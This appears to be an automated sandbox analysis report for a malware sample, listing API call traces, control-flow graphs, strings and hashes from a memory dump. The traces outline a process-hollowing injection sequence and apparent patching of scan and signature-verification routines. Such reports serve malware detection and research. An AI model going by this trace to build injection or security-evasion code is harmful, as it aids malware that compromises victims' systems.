40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 NtUnmapViewOfSection 4470->4542 4570 40d8bbc-40d8ccb call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40cfb80 4541->4570 4628 40d89af-40d89cb call 40cfb80 4542->4628 4629 40d89d7-40d8a43 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 4542->4629 4570->4234 4634 40d8cd1-40d8dca call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40d7d5c 4570->4634 4635 40d89d0-40d89d5 4628->4635 4636 40d8a48-40d8b3f call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40cfb80 4629->4636 4707 40d8dcc-40d8e19 call 40d7c54 call 40b737c 4634->4707 4708 40d8e1e-40d96a8 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 NtWriteVirtualMemory call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 NtWriteVirtualMemory call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 SetThreadContext NtResumeThread call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b2cc8 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40cfcd8 * 3 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40cfcd8 * 4 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 call 40b4b0c call 40b4c4c call 40b4980 call 40b4a98 call 40b4c4c call 40b4980 call 40cfd38 4634->4708 4635->4636 4709 40d8b44-40d8b49 4636->4709 4707->4708 4708->4234 4709->4570
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 040CFD38: GetProcAddress.KERNEL32(0414A358,00000000), ref: 040CFD97
                                                                                                                                    • Part of subcall function 040CFD38: GetCurrentProcess.KERNEL32(0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040CFDE3
                                                                                                                                    • Part of subcall function 040CFD38: FreeLibrary.KERNEL32(0414A358,00000000,0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000), ref: 040CFDF4
                                                                                                                                  • GetThreadContext.KERNEL32(0414A3FC,0414A44C,ScanString,0414A3D0,040D9710,UacInitialize,0414A3D0,040D9710,ScanBuffer,0414A3D0,040D9710,ScanBuffer,0414A3D0,040D9710,OpenSession,0414A3D0), ref: 040D85CE
                                                                                                                                  • NtReadVirtualMemory.NTDLL(0414A3F8,0414A4E8,0414A520,00000004,0414A528), ref: 040D882B
                                                                                                                                  • NtUnmapViewOfSection.NTDLL(0414A3F8,040DAF38), ref: 040D89A6
                                                                                                                                    • Part of subcall function 040CFB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040CFB8D
                                                                                                                                    • Part of subcall function 040CFB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040CFB93
                                                                                                                                    • Part of subcall function 040CFB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040CFBB3
                                                                                                                                  • NtWriteVirtualMemory.NTDLL(0414A3F8,0414A524,00000000,0414A534,0414A528), ref: 040D8F89
                                                                                                                                  • NtWriteVirtualMemory.NTDLL(0414A3F8,0414A4E8,0414A524,00000004,0414A528), ref: 040D90FC
                                                                                                                                  • SetThreadContext.KERNEL32(0414A3FC,0414A44C,ScanBuffer,0414A3D0,040D9710,ScanString,0414A3D0,040D9710,Initialize,0414A3D0,040D9710,0414A3F8,0414A4E8,0414A524,00000004,0414A528), ref: 040D9272
                                                                                                                                  • NtResumeThread.NTDLL(0414A3FC,00000000), ref: 040D927F
                                                                                                                                    • Part of subcall function 040CFCD8: LoadLibraryW.KERNEL32 ref: 040CFCEA
                                                                                                                                    • Part of subcall function 040CFCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 040CFCF7
                                                                                                                                    • Part of subcall function 040CFCD8: NtWriteVirtualMemory.NTDLL(0414A3F8,00000000,?,00000001,?), ref: 040CFD0E
                                                                                                                                    • Part of subcall function 040CFCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,040D9710,ScanString,0414A3D0,040D9710,Initialize,0414A3D0,040D9710,UacScan,0414A3D0,040D9710,UacInitialize,0414A3D0), ref: 040CFD1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextFree$AllocateCurrentHandleLoadModuleProcessReadResumeSectionUnmapView
                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
                                                                                                                                  • API String ID: 98964713-1058128293
                                                                                                                                  • Opcode ID: 663cd06bf1335407f5951c38ef2a8edeb928b463cf62e61fd94e7cfa4e34b240
                                                                                                                                  • Instruction ID: b55f9f1877b2a272821afea356edc749e7d95fc32f9d723c2c530355a3652aa7
                                                                                                                                  • Opcode Fuzzy Hash: 663cd06bf1335407f5951c38ef2a8edeb928b463cf62e61fd94e7cfa4e34b240
                                                                                                                                  • Instruction Fuzzy Hash: F3D23E71A402199BEB11EB64DD90FCEB3B9AF45308F1145A2E144BB215DA30FF86CF99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 4966 40b5ddc-40b5e1d GetModuleFileNameA RegOpenKeyExA 4967 40b5e5f-40b5ea2 call 40b5c18 RegQueryValueExA 4966->4967 4968 40b5e1f-40b5e3b RegOpenKeyExA 4966->4968 4973 40b5ec6-40b5ee0 RegCloseKey 4967->4973 4974 40b5ea4-40b5ec0 RegQueryValueExA 4967->4974 4968->4967 4969 40b5e3d-40b5e59 RegOpenKeyExA 4968->4969 4969->4967 4971 40b5ee8-40b5f19 lstrcpyn GetThreadLocale GetLocaleInfoA 4969->4971 4975 40b5f1f-40b5f23 4971->4975 4976 40b6002-40b6009 4971->4976 4974->4973 4977 40b5ec2 4974->4977 4978 40b5f2f-40b5f45 lstrlen 4975->4978 4979 40b5f25-40b5f29 4975->4979 4977->4973 4980 40b5f48-40b5f4b 4978->4980 4979->4976 4979->4978 4981 40b5f4d-40b5f55 4980->4981 4982 40b5f57-40b5f5f 4980->4982 4981->4982 4983 40b5f47 4981->4983 4982->4976 4984 40b5f65-40b5f6a 4982->4984 4983->4980 4985 40b5f6c-40b5f92 lstrcpyn LoadLibraryExA 4984->4985 4986 40b5f94-40b5f96 4984->4986 4985->4986 4986->4976 4987 40b5f98-40b5f9c 4986->4987 4987->4976 4988 40b5f9e-40b5fce lstrcpyn LoadLibraryExA 4987->4988 4988->4976 4989 40b5fd0-40b6000 lstrcpyn LoadLibraryExA 4988->4989 4989->4976
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 040B5DF8
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5E16
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5E34
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 040B5E52
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,040B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 040B5E9B
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,040B6048,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,040B5EE1,?,80000001), ref: 040B5EB9
                                                                                                                                  • RegCloseKey.ADVAPI32(?,040B5EE8,00000000,00000000,00000005,00000000,040B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5EDB
                                                                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 040B5EF8
                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 040B5F05
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 040B5F0B
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 040B5F36
                                                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 040B5F7D
                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 040B5F8D
                                                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 040B5FB5
                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 040B5FC5
                                                                                                                                  • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 040B5FEB
                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 040B5FFB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                  • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                  • API String ID: 1759228003-3917250287
                                                                                                                                  • Opcode ID: f01c1e1e0a223ba9f55943cbe8f61314a8c810c2fd8dabe9f0d0d7df936e529b
                                                                                                                                  • Instruction ID: e29bc7663b756f58ecfa3543664b940b475f797ed103569594633155af47886c
                                                                                                                                  • Opcode Fuzzy Hash: f01c1e1e0a223ba9f55943cbe8f61314a8c810c2fd8dabe9f0d0d7df936e529b
                                                                                                                                  • Instruction Fuzzy Hash: 5951A871A0024C7EFB25D7A4CC46FEF77EC9B04788F4004A1A684FA181E674BA548BE5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5071 40cfcd8-40cfcf3 LoadLibraryW 5072 40cfcf5-40cfcfe GetProcAddress 5071->5072 5073 40cfd22-40cfd2a 5071->5073 5074 40cfd1c-40cfd1d FreeLibrary 5072->5074 5075 40cfd00-40cfd18 NtWriteVirtualMemory 5072->5075 5074->5073 5075->5074 5076 40cfd1a 5075->5076 5076->5074
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryW.KERNEL32 ref: 040CFCEA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 040CFCF7
                                                                                                                                  • NtWriteVirtualMemory.NTDLL(0414A3F8,00000000,?,00000001,?), ref: 040CFD0E
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,040D9710,ScanString,0414A3D0,040D9710,Initialize,0414A3D0,040D9710,UacScan,0414A3D0,040D9710,UacInitialize,0414A3D0), ref: 040CFD1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                  • API String ID: 1002360270-4067648912
                                                                                                                                  • Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                                                  • Instruction ID: 367dc9645746aefa72b4f01c5e573656a8fc336e5dadcb1229a4fca86c52a903
                                                                                                                                  • Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
                                                                                                                                  • Instruction Fuzzy Hash: B8F089325052556EF15062646C40EFF76AECBC1778F148A2DF594AA1C0D662AD4482FB
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040CFB8D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040CFB93
                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040CFBB3
                                                                                                                                  Strings
                                                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 040CFB88
                                                                                                                                  • NtAllocateVirtualMemory, xrefs: 040CFB83
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                  • API String ID: 421316089-2206134580
                                                                                                                                  • Opcode ID: 50bca006be28b90ecfd8ecca1c634a1d7605c993ecb31e36c46f4b67d1328cc4
                                                                                                                                  • Instruction ID: a7b7b31957f083bb11fe1bf3e9bd29f394e4987db8bdbf0850288cac5d04bc32
                                                                                                                                  • Opcode Fuzzy Hash: 50bca006be28b90ecfd8ecca1c634a1d7605c993ecb31e36c46f4b67d1328cc4
                                                                                                                                  • Instruction Fuzzy Hash: E0E0E5B6240209BBDB00DF98D941EDB37ECEB08740B004415BA08E7201D735E9508BA6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 040CFB8D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040CFB93
                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 040CFBB3
                                                                                                                                  Strings
                                                                                                                                  • C:\Windows\System32\ntdll.dll, xrefs: 040CFB88
                                                                                                                                  • NtAllocateVirtualMemory, xrefs: 040CFB83
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                                  • API String ID: 421316089-2206134580
                                                                                                                                  • Opcode ID: 54de8600f5b9d64f73ada4c0214ae63c68275fa51d4f1fb03289492b3e88b940
                                                                                                                                  • Instruction ID: c4117db52c72022879fe51bdc7d80b42fd3ba03551a197befbaff36f9703625b
                                                                                                                                  • Opcode Fuzzy Hash: 54de8600f5b9d64f73ada4c0214ae63c68275fa51d4f1fb03289492b3e88b940
                                                                                                                                  • Instruction Fuzzy Hash: 51E012B624020DBBCB00EF98D981ECB37ECEB08740F004406BA08EB201DB35F950CBA6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(0414A358,00000000), ref: 040CFD97
                                                                                                                                  • GetCurrentProcess.KERNEL32(0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 040CFDE3
                                                                                                                                  • FreeLibrary.KERNEL32(0414A358,00000000,0414A35C,Function_00005ADC,00000004,0414A360,00000000,0414A35C,17D783FC,00000040,0414A360,0414A358,00000000,00000000,00000000,00000000), ref: 040CFDF4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressCurrentFreeLibraryProcProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4006369052-0
                                                                                                                                  • Opcode ID: 986dd824a8754cd4c4cb1db69f1774ff7cd07cf09d9633d06f7f9f2d4bba3c64
                                                                                                                                  • Instruction ID: 7299e774a50139da96f8101b566e6630fdba2bd407bb9afb113ea00a8bf50ba5
                                                                                                                                  • Opcode Fuzzy Hash: 986dd824a8754cd4c4cb1db69f1774ff7cd07cf09d9633d06f7f9f2d4bba3c64
                                                                                                                                  • Instruction Fuzzy Hash: F8117F71680204ABEB10FBA8CD52FDE77A8DF44B4CF514824B184F7292DA39BD408B99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0410B7A3
                                                                                                                                  • NtClose.NTDLL(?), ref: 0410B81D
                                                                                                                                    • Part of subcall function 040B4F68: SysFreeString.OLEAUT32 ref: 040B4F76
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$CloseFreeNameName_String
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 11680810-0
                                                                                                                                  • Opcode ID: d5e3c6e6f76cc681fe04342ebf49db991ace250901030d4858c1c4b4affca6ca
                                                                                                                                  • Instruction ID: 3fe0b8aedde59ede2f6f05a0595d564f94d7ef2b15b6bedeace11db2f7c19c83
                                                                                                                                  • Opcode Fuzzy Hash: d5e3c6e6f76cc681fe04342ebf49db991ace250901030d4858c1c4b4affca6ca
                                                                                                                                  • Instruction Fuzzy Hash: 9621CF71A54318BEEB11EBE4CC82FDE77ACEB08B08F514565B600F71D1DAB4BA058794
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,040F7598), ref: 040F7441
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 040F748F
                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 040F74C5
                                                                                                                                  • RegisterClipboardFormatA.USER32(00000000), ref: 040F74DB
                                                                                                                                    • Part of subcall function 040C7B44: RtlInitializeCriticalSection.NTDLL(List), ref: 040C7B63
                                                                                                                                    • Part of subcall function 040F7028: SetErrorMode.KERNEL32(00008000), ref: 040F7041
                                                                                                                                    • Part of subcall function 040F7028: GetModuleHandleA.KERNEL32(USER32,00000000,040F718E,?,00008000), ref: 040F7065
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 040F7072
                                                                                                                                    • Part of subcall function 040F7028: LoadLibraryA.KERNEL32(imm32.dll,00000000,040F718E,?,00008000), ref: 040F708E
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmGetContext), ref: 040F70B0
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmReleaseContext), ref: 040F70C5
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmGetConversionStatus), ref: 040F70DA
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmSetConversionStatus), ref: 040F70EF
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmSetOpenStatus), ref: 040F7104
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmSetCompositionWindow), ref: 040F7119
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmSetCompositionFontA), ref: 040F712E
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmGetCompositionStringA), ref: 040F7143
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmIsIME), ref: 040F7158
                                                                                                                                    • Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmNotifyIME), ref: 040F716D
                                                                                                                                    • Part of subcall function 040F7028: SetErrorMode.KERNEL32(?,040F7195,00008000), ref: 040F7188
                                                                                                                                    • Part of subcall function 04101538: GetKeyboardLayout.USER32(00000000), ref: 0410157D
                                                                                                                                    • Part of subcall function 04101538: GetDC.USER32(00000000), ref: 041015D2
                                                                                                                                    • Part of subcall function 04101538: GetDeviceCaps.GDI32(00000000,0000005A), ref: 041015DC
                                                                                                                                    • Part of subcall function 04101538: ReleaseDC.USER32(00000000,00000000), ref: 041015E7
                                                                                                                                    • Part of subcall function 04102740: LoadIconA.USER32(04147030,MAINICON), ref: 04102837
                                                                                                                                    • Part of subcall function 04102740: GetModuleFileNameA.KERNEL32(04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?,00000000,?,00000000,040F7598), ref: 04102869
                                                                                                                                    • Part of subcall function 04102740: OemToCharA.USER32(?,?), ref: 0410287C
                                                                                                                                    • Part of subcall function 04102740: CharNextA.USER32(?,?,?,04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?,00000000), ref: 041028BB
                                                                                                                                    • Part of subcall function 04102740: CharLowerA.USER32(00000000,?,?,?,04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?), ref: 041028C1
                                                                                                                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,040F7598), ref: 040F755F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 040F7570
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CharModule$CurrentErrorHandleLoadMode$AtomCapsClipboardCriticalDeviceFileFormatGlobalIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterReleaseSectionThread
                                                                                                                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                                                                  • API String ID: 1057156030-1126952177
                                                                                                                                  • Opcode ID: 852a8b46a83f871145cc75d002059090c737d9721559722dee6042179705ab5e
                                                                                                                                  • Instruction ID: 39a98c13365bcc990180284cf0dfcd9b044c6e91d64984d7ed03b223f9ce5192
                                                                                                                                  • Opcode Fuzzy Hash: 852a8b46a83f871145cc75d002059090c737d9721559722dee6042179705ab5e
                                                                                                                                  • Instruction Fuzzy Hash: 374138B8A002058FEB00FFA9D880ADE77A9EF4970CB018574E504FB751DA79B9408F99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5027 4102740-410274d 5028 4102757-410276f call 40cd8bc 5027->5028 5029 410274f-4102752 call 40b3bdc 5027->5029 5033 4102771-4102779 5028->5033 5034 410277f-4102789 5028->5034 5029->5028 5033->5034 5035 4102799-4102890 call 40b38a0 * 3 call 40d7150 LoadIconA call 40d7524 GetModuleFileNameA OemToCharA call 40bce38 5034->5035 5036 410278b-4102793 5034->5036 5049 41028a0-41028af call 40bce6c 5035->5049 5050 4102892-410289b call 40b9024 5035->5050 5036->5035 5054 41028b1 5049->5054 5055 41028b4-41028e9 CharNextA CharLowerA call 40b49f8 call 40cea38 5049->5055 5050->5049 5054->5055 5059 41028ee-41028fc 5055->5059 5060 4102905-4102934 call 4104b14 call 4105674 5059->5060 5061 41028fe-4102900 call 4102a94 5059->5061 5067 4102945-410294c 5060->5067 5068 4102936-4102942 call 40b3c34 5060->5068 5061->5060 5068->5067
                                                                                                                                  APIs
                                                                                                                                  • LoadIconA.USER32(04147030,MAINICON), ref: 04102837
                                                                                                                                  • GetModuleFileNameA.KERNEL32(04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?,00000000,?,00000000,040F7598), ref: 04102869
                                                                                                                                  • OemToCharA.USER32(?,?), ref: 0410287C
                                                                                                                                  • CharNextA.USER32(?,?,?,04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?,00000000), ref: 041028BB
                                                                                                                                  • CharLowerA.USER32(00000000,?,?,?,04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?), ref: 041028C1
                                                                                                                                    • Part of subcall function 04102A94: GetClassInfoA.USER32(041497F8,0411B674,?), ref: 04102AF3
                                                                                                                                    • Part of subcall function 04102A94: RegisterClassA.USER32(0411B650), ref: 04102B0B
                                                                                                                                    • Part of subcall function 04102A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04102BA7
                                                                                                                                    • Part of subcall function 04102A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04102BC9
                                                                                                                                  Strings
